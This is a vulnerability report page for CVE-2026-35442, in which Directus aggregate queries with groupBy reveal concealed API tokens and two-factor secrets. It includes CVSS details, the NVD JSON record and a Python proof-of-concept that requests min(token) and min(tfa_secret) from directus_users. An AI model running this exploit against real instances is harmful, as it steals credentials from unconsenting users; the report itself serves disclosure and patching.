Security Vulnerability Report
CVE-2026-35442 CVSS 8.1 HIGH

CVE-2026-35442

Published: 2026-04-06 22:16:23
Last Modified: 2026-04-20 16:32:37

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 11.17.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://your-directus-instance/items/directus_users"
access_token = "YOUR_LOW_PRIVILEGE_TOKEN"  # Token of a user with read access

# Exploit payload: Using aggregate function 'min' on a concealed field (e.g., 'token')
# Combined with 'groupBy' to bypass the conceal logic and expose raw values.
payload = {
    "groupBy[]": ["id"],
    "fields": ["id", "min(token)", "min(tfa_secret)"]  # Targeting concealed fields
}

headers = {
    "Authorization": f"Bearer {access_token}"
}

try:
    response = requests.get(target_url, headers=headers, params=payload)
    if response.status_code == 200:
        print("[+] Exploit successful! Sensitive data extracted:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35442", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:22.853", "lastModified": "2026-04-20T16:32:37.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}